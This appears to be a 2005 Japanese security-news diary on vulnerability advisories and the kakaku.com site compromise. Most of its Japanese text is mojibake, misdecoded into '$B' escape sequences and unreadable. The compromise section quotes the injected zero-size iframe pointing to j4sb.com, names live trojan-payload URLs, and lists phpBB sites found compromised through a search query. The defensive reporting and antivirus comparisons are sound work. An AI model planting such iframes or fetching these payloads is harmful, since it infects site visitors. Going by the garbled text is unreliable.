$B!V(BFirefox$B!W$KG$0U%3!<%I$,

$B!!(BMozilla 1.7.8 $BF|K\8lHG$,EP>l$7$F$$$^$9!#>.=P$5$s>pJs$"$j$,$H$&$4$6$$$^$9!#(B

• Mozilla Suite (mozilla-japan.org)

$B!!@hF|EP>l$7$?(B Mac OS X 10.4.1 (Client, Server) $B$K$OJ#?t$N%;%-%e%j%F%#7g4Y$KBP$9$k=$@5$,4^$^$l$F$$$k$=$&$G$9!#(B

• Bluetooth - CAN-2005-1333

  Mac OS X Bluetooth File and Object Exchange Directory Traversal $B$N7o!#(BMac OS X 10.3.x $B$G$O(B Security Update 2005-005 $B$G=$@5$5$l$F$$$k!#(B

• Dashboard - CAN-2005-1474

  Tiger$B!'0-0U$N$"$k%5%$%H$,>! $B$NOC$@$H;W$o$l!#(B

• Kernel - CAN-2005-1472

  $BFI$_0lMw$r

• Kernel - CAN-2005-0974

  nfs_mount() $B$K7g4Y$,$"$j!"(Blocal user $B$,(B DoS $B967b$r

• SecurityAgent - CAN-2005-1473

  $B%m%C%/$5$l$?%9%/%j!<%s%;!<%P$+$i%"%W%j%1!<%7%g%s$r5/F0$G$-$k!#(B

$B!!4XO"(B:

• $B8EJkNC;a$K$h$k(B APPLE-SA-2005-05-19 Mac OS X v10.4.1 $BK.LuHG(B: [harden-mac:0727]

• Solaris $BJ}LL(B

  • 0101-01$B!!35MW!'(Bautomountd $B$N(B DoS(Denial of Service) $B$K$D$$$F(B (CTC)
  • 0100-01$B!!35MW!'(BNIS+ $B$N@H (CTC)
  • 0099-01$B!!35MW!'(Blibtiff(3) $B$N@H (CTC)

OLE $B$*$h$S(B COM $B$N@H

$B!!IT6q9g>pJs(B: 894391 - [FIX] $B%;%-%e%j%F%#99?7%W%m%0%i%`(B MS05-012 $B$r%$%s%9%H!<%k8e!"%j%C%A%F%-%9%H7A<0$NEE;R%a!<%k%a%C%;!<%8$G(B 2 $B%P%$%HJ8;z%;%C%H$NE:IU%U%!%$%kL>$,I=<($5$l$:!"%(%i!<%a%C%;!<%8(B "Generic Host Process" $B$,I=<($5$l$k$3$H$,$"$k(B (Microsoft)$B!#(B patch $B$b8x3+$5$l$F$$$k(B: $B%-!<%o!<%I(B "894391" (Microsoft $B%@%&%s%m!<%I%;%s%?!<(B)$B!#(B $B$3$N(B patch $B$G

• 894589 - [OL2003] MS05-012 $BE,MQ8e$KE:IU%U%!%$%kL>$,6uGr$K$J$k(B (Microsoft)$B!#(B894391 $B$,L@5-$5$l$F$$$k!#(B

• 894194 - $B%;%-%e%j%F%#99?7%W%m%0%i%`(B 873333 $B$N%$%s%9%H!<%k8e!"%G%P%C%0%$(B $B%s%?!<%U%'%$%9(B IMallocSpy $B$r (Microsoft)$B!#(B894391 $B$G=$@5$5$l$k$H$OL@5-$5$l$F$$$J$$$,!"(B $B1Q8lHG(B KB $B$K<($5$l$F$$$k=$@5%W%m%0%i%`$N%P!<%8%g%s$h$j$b(B 894391 $B$NJ}$,%P!<%8%g%s$,>e$J$N$G!"=$@5$5$l$F$$$k2DG=@-$,9b$$$H;W$o$l!#(B

$B!!(B896648 - $B%;%-%e%j%F%#99?7%W%m%0%i%`(B 873333 $B!J(BMS05-012$B!K(B $B$N%$%s%9%H!<%k8e(B svchost.exe $B%(%i!<$,H/@8$9$k$3$H$,$"$j$^$9(B (Microsoft) $B$K$D$$$F$O!V(BWindows XP COM+ $B=$@5%W%m%0%i%`%m!<%k%"%C%W%Q%C%1!<%8(B 9 $B$r!W$N$^$^$@$,!"(B 894391 $B$r%$%s%9%H!<%k$9$k$H8F$S=P$5$lB&$N(B ole32.dll $B$,99?7$5$l$k$N$G!">u67$,JQ2=$9$k$+$b$7$l$J$$!#(B

$B!!%U%m!<%H$5$s>pJs$"$j$,$H$&$4$6$$$^$9!#(B

TCP/IP $B$N@H

$B!!(BMS05-019 patch $B$K$O!"(BVulnerability Note VU#637934: TCP does not adequately validate segments before updating timestamp value $B$KBP$9$k=$@5$b4^$^$l$F$$$k$=$&$@!#(B

• Microsoft Security Advisory (899480): Vulnerability in TCP Could Allow Connection Reset (Microsoft)

$B!!$^$?(B Microsoft Security Advisory (899480) $B$K$O!"(BMS05-019 patch $B$,(B 6 $B7n$K:F%j%j!<%9$5$l$kM=Dj$G$"$k!"$H$b5-:\$5$l$F$$$k!#(B KB898060 $BLdBj$,=$@5$5$l$k$h$&$@!#(B

NISCC Vulnerability Advisory ICMP - 532967: Vulnerability Issues in ICMP packets with TCP payloads

$B!!(B$B!V(BTCP$B ($BF|N)(B)

$B!!J#?t%Y%s%@$N(B TCP $BRFC1323: TCP Extensions for High Performance $B$GDj5A$5$l$F$$$k(B TCP Timestamps $B%*%W%7%g%s$H!"$3$l$b(B RFC1323 $B$G2r@b$5$l$F$$$k(B PAWS (Protect Against Wrapped Sequence Numbers) $B$NN>J}$,M-8z$K$5$l$?>l9g$r9M$($k!#(B $B$3$N$H$-!"%[%9%H$N(B IP $B%"%I%l%9!&%]!<%HHV9f$NB>$K!"FbIt%?%$%^CM$H(B TCP $B%7!<%1%s%9HV9f$rCN$k$3$H$,$G$-$k$H!"(B $B!V(BTCP Timestamps > $BFbIt%?%$%^!"(BTCP $B%7!<%1%s%9HV9f(B < $B8=:_$N(B TCP $B%7!<%1%s%9HV9f!W$H$$$&%Q%1%C%H$rA^F~$9$k$3$H$K$h$C$F!"(B PAWS $B5!9=$r0-MQ$7$?(B TCP $B%j%;%C%H967b$r9T$&$3$H$,2DG=!#(B $B$3$3$^$G$O;EMM$J$N$@$,!"(B $B0lIt$N(B TCP $BZ$7$F$$$J$$$?$a!"(B PAWS $B5!9=$r0-MQ$7$?(B TCP $B%j%;%C%H967b$r$h$jMF0W$KCAN-2005-0356

$B!!2sHr:v$H$7$F!"(BRAWS $B$NL58z2=$,5s$2$i$l$F$$$k!#(B

$B!!7g4Y$N$"$k%Y%s%@$H$7$F!"(BCisco, Microsoft, FreeBSD, OpenBSD, $BF|N)$J$I$,5s$2$i$l$F$$$k!#(B

• Cisco Security Notice: Vulnerability in a Variant of the TCP Timestamps Option (Cisco)$B!#0lIt%W%m%@%/%H$K7g4Y$,$"$k!#(BIOS $BF~$j$N%W%m%@%/%H$K$O$3$N7g4Y$O$J$$$=$&$@!#(B

• Microsoft Security Advisory (899480): Vulnerability in TCP Could Allow Connection Reset (Microsoft)$B!#(B Windows XP SP2 / Server 2003 SP1 $B$*$h$S(B MS05-019 patch $B$rE,MQ$7$F$"$k>l9g$K$O!"$3$N7g4Y$O$J$$$=$&$@!#(B

• FreeBSD Information for VU#637934 (cert.org)$B!#(B src/sys/netinet/tcp_input.c $B$N(B 1.252.2.16 $B$,$=$l$G$7$g$&$+!#(B 1.252.2.15 $B$H$N(B diff$B!#(B

  $B!D!D(B SA $B=P$^$7$?(B: FreeBSD-SA-05:15.tcp - TCP connection stall denial of service

• 015: RELIABILITY FIX: April 4, 2005 (OpenBSD 3.6)

• $B!Z(BAX-VU2005-02$B![(B TCP$B%?%$%`%9%?%s%W%*%W%7%g%s$K4X$9$k@H (ALAXALA Networks)

• $B!V(BTCP$B%?%$%`%9%?%s%W%*%W%7%g%s$K4X$9$k@H ($BF|N)(B)

• BIG-IP TCP Timestamp Denial of Service

$B!!4XO"(B:

• JVNVU#637934: TCP $B$N (JVN)

$B!!(BCVE: CAN-2005-0356$B!"(B BIG-IP TCP Timestamp Denial of Service $B$rDI2C!#(B

2005.07.04 $BDI5-(B:

$B!!(BFreeBSD $B$N9`$K(B FreeBSD-SA-05:15.tcp - TCP connection stall denial of service $B$rDI2C$7$^$7$?!#(B

$B!!(BJVN#465742E4 $B$G$O(B AsWiki $B$H(B Hiki $B$O!V3:Ev@=IJ$J$7!W$H$J$C$F$$$k$N$@$,!"

• PukiWiki - Default setting of file-attaching function allows XSS (- 1.4.5_1)

• Wiki $B$b$I$-(B - Wiki$B$b$I$-(B $B%;%-%e%j%F%#>pJs(B

• AsWiki

• Hiki - Hiki $B$N(B JVN#465742E4 $B$X$NBP1~(B

$B!!(BWiki$B$b$I$-(B $B%;%-%e%j%F%#>pJs(B$B$K$O!VE:IU%U%!%$%k5!G=$NMxMQ@)8B!W$H$$$&$b$N$b7G:\$5$l$F$$$k$N$@$,!"(BInternet Explorer $B$_$?$$$J%V%i%&%6(B (Content-Type $B$G$O$J$/Cf?H$r8+$F>!

$B!!$"$H!"$?$H$($P(B FreeStyleWiki $B$K$b!V%U%!%$%kE:IU5!G=!W$,$"$k$h$&$J$N$@$,!"K\7o$K$D$$$F$I$&$J$C$F$$$k$N$+!"$O!"$h$/$o$+$i$J$$!#(B

$B!!4XO"(B:

• JVN#465742E4$B!'(B Wiki $B%/%m!<%s$K$*$1$k%/%m%9%5%$%H!&%9%/%j%W%F%#%s%0$N@H (IPA ISEC)

• Wiki $B$N%U%!%$%kE:IU$N@H ($B?eL57n$P$1$i$N$($SF|5-(B)

  $BBP1~$H$7$F$O!"(B
  * $BE:IU$rL58z$K$9$k(B
  * Content-Disposition $B%U%#!<%k%I$J$I$r$D$1$F!"E:IU%U%!%$%k$,$=$N>l$G3+$+$l$J$$(B ($B6/@)E*$K%@%&%s%m!<%I$5$l$k(B) $B$h$&$K$9$k(B
  $B$H$$$C$?$b$N$,$"$j$^$9!#(BHiki $B$O8e

$B!!(BFreeStyleWiki $B$K$bF1MM$N7g4Y$,$"$C$?$h$&$G!"(B3.5.8 $B$G=$@5$5$l$F$$$k$=$&$G$9(B:

• $BMzNr(B/2005-5-19 (FreeStyleWiki)

2005.05.25 $BDI5-(B:

$B!!(B$B%U%!%$%kE:IU$N@H ($B$U$'$_$K$sF|5-(B, 5/21)$B!#(BHiki $B$G

2005 $BG/(B 4 $B7n$N%;%-%e%j%F%#>pJs(B

$B!!(BWindows $B%$%s%9%H!<%i(B 3.1(v2) $B$H!"(BWindows 2003 SP1 $B$*$h$S(B 64bit $BHG(B Windows XP $BMQ$N(B Windows $B%$%s%9%H!<%i(B 3.1 $B%"%C%W%G!<%H$,8x3+$5$l$F$$$^$9!#(B

• 893803 - Windows Installer 3.1 (v2) is available (Microsoft)

  Issue that is addressed in Windows Installer 3.1 (v2)
  Windows Installer no longer fails silently when the installer tries to update a file that is protected by the Windows File Protection feature.

• 898715 - An update for Windows Installer 3.1 is available for Windows Server 2003 SP1 and for the 64-bit editions of Windows XP (Microsoft)

bid 9986: OpenSSH SCP Client File Corruption Vulnerability

$B!!(BCVE: CAN-2004-0175

• Red Hat Enterprise Linux:
  RHSA-2005:106-04 - openssh security update
  RHSA-2005:074-10 - rsh security update

*BSD, SCO OpenServer / UnixWare Hyper-Threading Considered Harmful

$B!!$I$&$d$i(B OS $B$K$O0MB8$7$J$$$*OC$@$C$?$h$&$G!D!D!#(B

• Cache Missing for Fun and Profit (daemonology.net)$B!#D>@\(B cache $B$NCf?H$rFI$a$k$o$1$G$O$J$$$N$@$1$l$I!"(Bcache $B$N>uBV$r4QB,$9$k$3$H$K$h$C$F!"$+$J$j$NNL$N>pJs$rF@$k$3$H$,$G$-$F$7$^$&$h$&$G$9!#(B
• CVE: CAN-2005-0109
• Hyper-Threading considered harmful $B$K$h$k$H!"(BLinux $BJ}LL$K$O$^$@F0$-$O$J$$$h$&$G$9!#(B
• [memo:8428] $BK\Ev$OI]$$(BHyperthreading$B!"(B[memo:8429]
• Hyper-Threading$B$N@H (MYCOM PC WEB)
• Pentium 4$B$N%O%$%Q!<%9%l%C%G%#%s%0$KH4$1F;(B--$B%Q%9%o!<%IEpFq$N$*$=$l(B (CNET)
• $B%$%s%F%k$N(BHyper-Threading$BBP1~(BCPU$B$K@H (Internet Watch)
• $B%O%$%Q!<%9%l%C%G%#%s%0$K?<9o$J@H (slashdot.jp)

$B!!$"$H!"(BFreeBSD-SA-05:09.htt [REVISED] $B$H(B SCOSA-2005.24: OpenServer 5.0.7 UnixWare 7.1.4 UnixWare 7.1.3 : Hyper-Threading information leakage $B$,=P$?$N$G!"$3$l$^$G$N5-;v$N$H$3$m$KDI2C$7$F$*$-$^$7$?!#(B

Internet Explorer $BMQ$NN_@QE*$J%;%-%e%j%F%#99?7%W%m%0%i%`(B (867282) (MS05-014)

$B!!I{:nMQ>pJs(B:

• 894926 - $B%;%-%e%j%F%#>pJs(B MS05-014 $B$K5-:\$5$l$F$$$k%;%-%e%j%F%#99?7%W%m%0%i%`(B 867282 $B$N%$%s%9%H!<%k8e!"(B<input type=image> $B%?%0$r;HMQ$9$k(B Web $B%5%$%H$+$i2hA|$r%3%T!<$7$?$H$-$K(B Internet Explorer $B$,0[>o=*N;$9$k(B (Microsoft)

$B!!(BMS05-020 $B$GBP1~$7$F$$$k$=$&$@!#(B

$B!V%&%$%k%9%;%-%e%j%F%#!W$K$*$1$k%R!<%W%*!<%P!<%U%m!

$B!!(BLAC SNS $B$+$i>pJs$,8x3+$5$l$^$7$?!#(B

• SNS Advisory No.81: SourceNext Virus Security 2005 Heap Overflow (LAC SNS)

• SNS Advisory No.82: SourceNext Virus Security 2005 Memory Leak (LAC SNS)

$B2A3J(B.com$B%5%$%H$,IT@5%"%/%;%9Ho32$GJD:?Cf(B

$B!!F1MM;vNc(B:

• $B@E2,?7J9 (asahi.com, 5/17)
• $B=EMW$J$*CN$i$;(B ($B$N$S$9$/@gBf(B, 5/17)

$B!!$7$+$7!"$=$s$JDxEY$G$O:Q$^$J$$$+$b!#$$$H$A$c$s$5$s$+$i(B ($B$"$j$,$H$&$4$6$$$^$9(B):

Google$B$G!V(BPowered by phpBB 2.0.11$B!W!JF|K\8l$G!K$r8!:w$7$F!"(BphpBB$B%5%$%H(B
http://www.ptexchange.net $B!J=$I|:Q$_!K(B
http://www.hobbyjapan.co.jp/dd/ddbbs
http://www.princess2.com/phpbb2/index.php
http://granadoespada.sub.jp/php/phpbb2/index.php
$B!J$^$G3NG'!#0J2<$b$"$k$+$b$7$l$^$;$s!#!K(B
$B$K2A3J%3%`$HF1$8$H;W$o$l$k2~$6$s$,$"$kLOMM$G$9!#(B
$B!J(Bj4sb.com$B$X$N(Biframe$B!K(B

$B!!$D!<$+(B phpBB 2.0.11 $B!D!D!#!V(BPowered by phpBB 2.0.11 $B$N8!:w7k2L$N$&$A(B $BF|K\8l$N%Z!<%8(B $BLs(B 1,010 $B7oCf(B 1 - 10 $B7oL\(B (0.30 $BIC(B) $B!W$C$F8@$o$l$k$7!#(B $B1Q8l$@$H8!:w$r%V%m%C%/$7$F$$$k$1$I!"F|K\8l$@$H(B ok $B$J$N$M(B > google$B!#$C$F!"(B[$B

$B!!(BSophos $B$,(B Troj/LegMir-AE (2005.05.17 19:45:48) $B$H$7$FBP1~$7$^$7$?!#(B $B%9%/%j%W%HItJ,$O(B Troj/Jfor-A (2005.05.18 04:31:50) $B$G$9!#(B $B4\;3$5$s>pJs$"$j$,$H$&$4$6$$$^$9!#(B

$B!!!D!D$=$N8e(B:

• $B!c=EMW!dIT@5%"%/%;%9H/@8$K$h$k7G<(HD%5!<%S%9Dd;_$H%&%$%k%9BP:v$K$D$$$F$N$*CN$i$;(B ($B%[%S!<%8%c%Q%s(B)
• $BIT@5%"%/%;%9$K$D$$$F(B (missing.co.jp, 2005.05.18)$B!#(B $B$/$@$s$N(B iframe $B$,Kd$a9~$^$l$F$$$?$3$H$O3N$+$J$s$G$9$,!D!D!#(B

$B!!(Bhttp://www.princess2.com/phpbb2/index.php $B$d(B http://granadoespada.sub.jp/php/phpbb2/index.php $B$bBP1~$5$l$?$h$&$G$9!#(B

$B!!4XO"JsF;(B:

• $B%H%C%W(B3$B$NEPO?E9J^$O!V$3$3?tF|$GGd>e$O(B20$B!s6/$N8:>/!W(B--$B2A3J(B.com$BJD:?$N1F6A(B (CNET, 2005.05.17)

• DNS lookups unreliable on untrusted networks (squid-cache.org)$B!#(Bsquid 2.5.STABLE9 $B0JA0$N7g4Y!#(B CVE: CAN-2005-1519

• [VulnWatch] Linux kernel ELF core dump privilege elevation$B!#(B CVE: CAN-2005-1589

• [VulnWatch] Linux kernel ELF core dump privilege elevation$B!#(B CVE: CAN-2005-1263

• [VulnWatch] BakBone NetVault last warning$B!#(B NetVault 6.x/7.x $BOC!#(B

• [VulnWatch] [DR018] Quartz Composer / QuickTime 7 information leakage$B!#(BMac OS X 10.4 $B>e$N(B QuickTime 7 $B$K$N$_7g4Y$,B8:_$9$k$H$$$&!#(B Mac OS X 10.4.1 $B$,EP>l$7$F$$$k$,!"$3$N7g4Y$,=$@5$5$l$F$$$k$+H]$+$OITL@!#(B

• Cisco Security Advisory: FWSM URL Filtering Solution TCP ACL Bypass Vulnerability$B!#(BCisco Firewall Services Module (FWSM) 2.3.1 $B0JA0$N7g4Y!#(B 2.3(2) $B$G=$@5$5$l$F$$$k!#(B

• Security Advisory for Bugzilla 2.18, 2.19.2, and 2.16.8

• qmail Integer Errors Let Remote Users Deny Service (SecurityTracker.com)

• 32-bit qmail fun (qmail-pop3d) (fwd)$B!#(B

• [Full-disclosure] Gaim 1.2.1 -- PoC Stack Overflow

• Yahoo! Messenger URL Handler Remote DoS Vulnerability

• Yahoo! Chat Add Buddy Without Consent Privacy Issue

• Security releases 8.0.3, 7.4.8, 7.3.10, 7.2.8 (postgresql.org)$B!#(B PostgreSQL 7.2.x$B!A(B8.0.x $B$K7g4Y$,$"$j!"(B8.0.3, 7.4.8, 7.3.10, 7.2.8 $B$G=$@5$5$l$?!#(B CVE: CAN-2005-1409 CAN-2005-1410

• [Full-disclosure] MySQL < 4.0.12 && MySQL <= 5.0.4 : Insecure tmp file handling$B!#(B MySQL 4.0.12 $B$G=$@5$5$l$F$$$k$=$&$@!D!D$,!"(BMySQL 5.0.4 $B$G$O$^$@$NLOMM!#(B

• Vulnerability Note VU#302220: IPsec configurations may be vulnerable to information disclosure (US CERT)$B!"(B NISCC-004033: IPSec$BDL?.$N@_Dj$KB8:_$9$k@H (JVN)$B!#(B $B%"%i%$%I%F%l%7%9!"F|N)!"%d%^%O!"8E2OEE5$9)6H$,!V3:Ev@=IJ$"$j!W$H$5$l$F$$$k!#(B

TCP/IP $B$N@H

$B!!(BWindows (XP, 2k3, Longhorn) is vulnerable to IpV6 Land attack. (ntbugtraq)$B!#(B patch $BE,MQ8e$b!"(BIPv6 $B$K$D$$$F$O(B land $B%"%?%C%/$,M-8z$G$"$k!"$H$$$&;XE&!#(B

$B2A3J(B.com$B%5%$%H$,IT@5%"%/%;%9Ho32$GJD:?Cf(B

$B!!%"%s%A%&%$%k%9%=%U%H$G$N%F%9%H7k2L$r2~D{$7$^$7$?!#%^%+%U%#!<$H%7%^%s%F%C%/$O(B a02.css $B$r%&%$%k%9$@$HH=Dj$9$k$h$&$K$J$j$^$7$?!#(B $B%^%+%U%#!<$N>l9g$O!"(Bhttp://www.j4sb.com/count/counter.ap?id=a05 $B$K%"%/%;%9$9$k$H=P$F$/$k%9%/%j%W%H$K$b(B Exploit-MhtRedir.gen $B$H$7$FBP1~$7$F$$$^$9!#(BMYST jellyfish $B$5$s>pJs$"$j$,$H$&$4$6$$$^$9!#(B

• $B0lIt(Be$B%3%^!<%9%5%$%H$X$NIT@5%"%/%;%9$KH<$&%&%$%k%9$NBP1~$K$D$$$F(B ($B%^%+%U%#!<(B)

$B!!%7%^%s%F%C%/$+$i$b:o=|%D!<%k$,8x3+$5$l$F$$$^$9!#(B MYST jellyfish $B$5$s>pJs$"$j$,$H$&$4$6$$$^$9!#(B

• Trojan.Jasbom $B6n=|%D!<%k(B ($B%7%^%s%F%C%/(B)

$B!!2A3J(B.com $B$HF1MM$N>u67$,!"(BWindowsCE FAN: PocketPC WindowsCE $B%7%0%^%j%*%s(B $BAm9g>pJs%5%$%H(B$B$G$bH/@8$7$F$$$?$h$&$G$9!#@6?e$5$s>pJs$"$j$,$H$&$4$6$$$^$9!#(B

• $B0-0U$"$kBh;0 (WindowsCE FAN, 2005.05.16)
• $B%5%$%H$,%&%#%k%9$K46@w$7$F$$$k$h$&$J$N$G$9$,(B (Pocket PC/WindowsCE $B$J$s$G$bAjCL<<(B )

$B!!(BFirefox 1.0.4 / Mozilla 1.7.8 $B$G=$@5$5$l$?7g4Y$O!"(B $B!V(BFirefox$B!W$KG$0U%3!<%I$, $B$N7o(B (MFSA2005-42) $B$@$1$8$c$J$+$C$?$s$G$9$M!#(B

• MFSA2005-44: $BHs(B DOM $B%W%m%Q%F%#$N>e=q$-$rDL$8$?FC8"$N3HBg(B (mozilla-japan.org)
• MFSA2005-43: $B!HFbJq$5$l$?!I!V(Bjavascript:$B!W7A<0$N(B URL $B$K$h$C$F%;%-%e%j%F%#%A%'%C%/$,%P%$%Q%9$5$l$k(B (mozilla-japan.org)

$B!!$I$A$i$b!V=EMWEY(B: $B:G9b!W$G$9!#(B2005.05.18 $B0J9_$K>\:Y$,8x3+$5$l$k$h$&$G$9!#(B

$B!!(B($B%?%$%H%k=$@5(B: $B$J$+$@$5$s46

$B!!2A3J(B.com $B$,!"CY$/$H$b(B 5/11 $B$^$G$KIT@5%"%/%;%9$5$l$F%3%s%F%s%D$N0lIt$,2~$6$s$5$l!"(B5/14 $B$KJD:?$5$l$k$^$G$N4V!"%&%$%k%9$D$-%5%$%H$K$J$C$F$$$?LOMM!#(B $B$*$*$+$o$5$s!"$f$&!#$5$s>pJs$"$j$,$H$&$4$6$$$^$9!#(B

$B$3$N2~$6$s$K$h$j!"2?

$B!!(BNOD32 $B$J$s$F%^%$%J!<$J%"%s%A%&%$%k%9%=%U%H$N>u67$@$12r@b$5$l$F$b!D!D(B(T_T)$B!#(B $BB(9o%a%8%c!<(B 3 $Bu67$r3NG'$9$k$N$,6Z$J$s$8$c$J$$$N$+!#(B

$B$=$NB>%;%-%e%j%F%#%=%U%H3F

$B!!$=$NDxEY$N$3$H$K2?;~4V$+$+$k$s$@$m$&!#(B 2ch.net $B$N$^$H$a%Z!<%8$@$H$$$&(B $B2A3J(B.com$B$,%/%i%C%-%s%0$G0l;~JD:?!"1\Mw%f!<%6!<$O%&%$%k%946@w$b!J!-!&&X!&!K(B $B$NJ}$,$h$C$]$I>\$7$$!#(B

879 $BL>A0!'(B $BL>L5$7$5$s!w#5<~G/(B [sage] $BEj9FF|!'(B 2005/05/16($B7n(B) 06:30:58 ID:8NCW1riY
PSW.Delf.FZ$B$N8!=PG=NO$N3NG'!#(B
ttp://www.j4sb.com/count/counter.ap?id=a02
ttp://www.j4sb.com/count/data/a02.css
$B>e5-(BURL$B$+$i(Ba02.css$B$rJ]B8$7$F$3$l$r%9%-%c%s(B

$B!!$d$C$F$_$^$7$?!#(B

NOD32 1.1097 (20050515)	>>CHM >>/# - Win32/TroyanDownloader.Small.AAO $B%H%m%$(B >>CHM >>/#.exe - Win32/PSW.Delf.FZ $B%H%m%$(B
F-Secure Anti-Virus for Linux Servers version 4.63 build 4110 Database version: 2005-05-14_01	Trojan-PSW.Win32.Delf.fz
Virus Scanner v3.1, VSAPI v7.510-1002 Trend Micro Inc. 1996,1997 Pattern number 2.631.00	$B8!=P$;$:(B ($B"((B)
$B%H%l%s%I%^%$%/%m(B $B%&%$%k%9%P%9%?!<(B 2005 $B%W%m%0%i%`%P!<%8%g%s(B: 12.2.1021 $B8!:w%(%s%8%s(B: 7.510.1002 $B%Q%?!<%s(B: 2.631.00	$B8!=P$;$:(B ($B"((B)
ClamAV 0.85/881/Tue May 17 06:13:31 2005	$B8!=P$;$:(B
Sophos AntiVirus 3.93.2	Troj/LegMir-AE (2005.05.17 19:45:48)
$B%^%+%U%#!<(B VirusScan Enterprise 8.0i + engine 4400 + dat 4492	PWS-Lineage
$B%7%^%s%F%C%/(B Norton AntiVirus 2005 + 20050516.022	Trojan.Jasbom

$B!!(BNOD32 $B$O(B a02.css $B$KBP$7$F(B 2 $B$D$N!V%&%$%k%9!W$r8!=P$7$F$$$k$N$G$9$M!#(B $B$J$*(B a02.css $B$O(B HTML HELP (.CHM) $B7A<0$N%U%!%$%k$N$h$&$G$9!#(B

$B!!(B($B"((B) a02.css $B$=$N$b$N$G$O$J$/!"96N,%9%/%j%W%H$HAH$_$"$o$5$l$?7k2L@8@.$5$l$k%U%!%$%k$r8!=P$9$k%W%m%@%/%H$b$"$k$h$&$G$9!#(B

• $B%H%l%s%I%^%$%/%m$N>l9g!"(B2.631.00 $B$G!"@8@.$5$l$?(B c:\winnt\system32\explorer.exe, RUNDLL32.EXE, htdll.dll $B$r(B TROJ_DELF.RM $B$H$7$F8!=P$9$k$=$&$G$9!#$A$$$A$c$s$5$s!"(BMYST jellyfish $B$5$s>pJs$"$j$,$H$&$4$6$$$^$9!#(B

$B!!F1MM;vNc(B: $B%;%-%e%j%F%#BP:v(B $B!J46@w8;%5%$%H!K(B: J-RMT (bne.jp)$B!#(B J-RMT $B$H$$$&$N$O(B http://j-rmt.com/ $B$N$h$&$G$9!#(Bhttp://j-rmt.com/ $B$K$O:#$G$b(B <iframe src=http://www.j4sb.com/count/counter.ap?id=a05 width=0 height=0></iframe> $B$H$+=q$+$l$F$$$^$9$N$G!";n$9>l9g$O==J,$4Cm0U$r!#(B J-RMT $B$O4Z9q$N%5%$%H$J$s$G$9$M!#(B

2005.05.16 $BDI5-(B:

$B!!%H%l%s%I%^%$%/%m$+$i(B TROJ_DELF.RM $B$N6n=|%D!<%k$,8x3+$5$l$F$$$^$9!#(B

• TROJ_DELF.RM $B@lMQ6n=|%D!<%k(B ($B%H%l%s%I%^%$%/%m(B)

$B!!5-;v$$$m$$$m(B:

• $B2A3J(B.com$B7PM3$G3H;6$7$?%&%$%k%9!"(BWindows$B$N4{CN$N@H (ITmedia, 2005.05.16)
• $B!V:G9b%l%Y%k$N%;%-%e%j%F%#$,GK$i$l$?!W!=!=%+%+%/%3%`!"IT@5%"%/%;%9;v7o$r@bL@(B (ITmedia, 2005.05.16)
• $B%+%+%/%3%`6[5^2q8+!"!V(B1$B=54V8e$KI|5lL\;X$9!W(B--$B (CNET, 2005.05.16)
• $B!V:G9b%l%Y%k$N%;%-%e%j%F%#!W$G$bIT@5%"%/%;%95v$9(B - $B2A3J(B.com (MYCOM PC WEB, 2005.05.16)
• $B!Z2A3J(B.com$BLdBj![0,ED ($BF|7P(B IT Pro, 2005.05.16)
• $B!ZB3Js![=$@5$7$F$$$k$=$P$+$i2~$6$s!"2A3J(B.com$B$,@8!9$7$/>u67@bL@(B ($BF|7P(B IT Pro, 2005.05.16)
• $B2A3J(B.com$B$,0l;~JD:?!"IT@5%"%/%;%9$G%H%m%$$NLZGO$r;E9~$^$l$k(B (Internet Watch, 2005.05.16)
• $B!V%=%U%H!"%O!<%I!"1?MQ$NA4$F$r:~?7!W2A3J(B.com$B!"(B23$BF|$r$a$I$KI|5l!!0,ED (Internet Watch, 2005.05.16)

$B!!$U$D$&$N4k6H$G$OH/@8$7$J$$>u67$K$J$C$F$$$k$K$b$+$+$o$i$:!V:G9b%l%Y%k$N%;%-%e%j%F%#$,GK$i$l$?!W$H$+!V:#2s$N967b$O!"%l%Y%k$N9b$$$b$N$@$C$?!W$H$+8@$($F$7$^$&!"$=$NH=CG4p=`$,M}2r$G$-$J$$!#(B $BK\Ev$K!V:G9b%l%Y%k$N%;%-%e%j%F%#!W$@$C$?$N$+!"$=$l$H$b!"(B $B85Cf$N?M$+$i8@$o$;$k$H!"<+6H<+F@$G$9(B (slashdot.jp) $B$,@5$7$$$N$+!#(B $BEv (kakaku.com) $B$G!V%5%$%P!<%F%m!W$H$$$&!"0B0W$K;H$&$Y$-$G$O$J$$8@MU$r;H$C$F$$$k$N$bBg$$$K5$$K$J$k!#(B

2005.05.17 $BDI5-(B:

$B!!%"%s%A%&%$%k%9%=%U%H$G$N%F%9%H7k2L$r2~D{$7$^$7$?!#%^%+%U%#!<$H%7%^%s%F%C%/$O(B a02.css $B$r%&%$%k%9$@$HH=Dj$9$k$h$&$K$J$j$^$7$?!#(B $B%^%+%U%#!<$N>l9g$O!"(Bhttp://www.j4sb.com/count/counter.ap?id=a05 $B$K%"%/%;%9$9$k$H=P$F$/$k%9%/%j%W%H$K$b(B Exploit-MhtRedir.gen $B$H$7$FBP1~$7$F$$$^$9!#(BMYST jellyfish $B$5$s>pJs$"$j$,$H$&$4$6$$$^$9!#(B

• $B0lIt(Be$B%3%^!<%9%5%$%H$X$NIT@5%"%/%;%9$KH<$&%&%$%k%9$NBP1~$K$D$$$F(B ($B%^%+%U%#!<(B)

$B!!%7%^%s%F%C%/$+$i$b:o=|%D!<%k$,8x3+$5$l$F$$$^$9!#(B MYST jellyfish $B$5$s>pJs$"$j$,$H$&$4$6$$$^$9!#(B

• Trojan.Jasbom $B6n=|%D!<%k(B ($B%7%^%s%F%C%/(B)

$B!!2A3J(B.com $B$HF1MM$N>u67$,!"(BWindowsCE FAN: PocketPC WindowsCE $B%7%0%^%j%*%s(B $BAm9g>pJs%5%$%H(B$B$G$bH/@8$7$F$$$?$h$&$G$9!#@6?e$5$s>pJs$"$j$,$H$&$4$6$$$^$9!#(B

• $B0-0U$"$kBh;0 (WindowsCE FAN, 2005.05.16)
• $B%5%$%H$,%&%#%k%9$K46@w$7$F$$$k$h$&$J$N$G$9$,(B (Pocket PC/WindowsCE $B$J$s$G$bAjCL<<(B )

2005.05.18 $BDI5-(B:

$B!!F1MM;vNc(B:

• $B@E2,?7J9 (asahi.com, 5/17)
• $B=EMW$J$*CN$i$;(B ($B$N$S$9$/@gBf(B, 5/17)

$B!!$7$+$7!"$=$s$JDxEY$G$O:Q$^$J$$$+$b!#$$$H$A$c$s$5$s$+$i(B ($B$"$j$,$H$&$4$6$$$^$9(B):

Google$B$G!V(BPowered by phpBB 2.0.11$B!W!JF|K\8l$G!K$r8!:w$7$F!"(BphpBB$B%5%$%H(B
http://www.ptexchange.net $B!J=$I|:Q$_!K(B
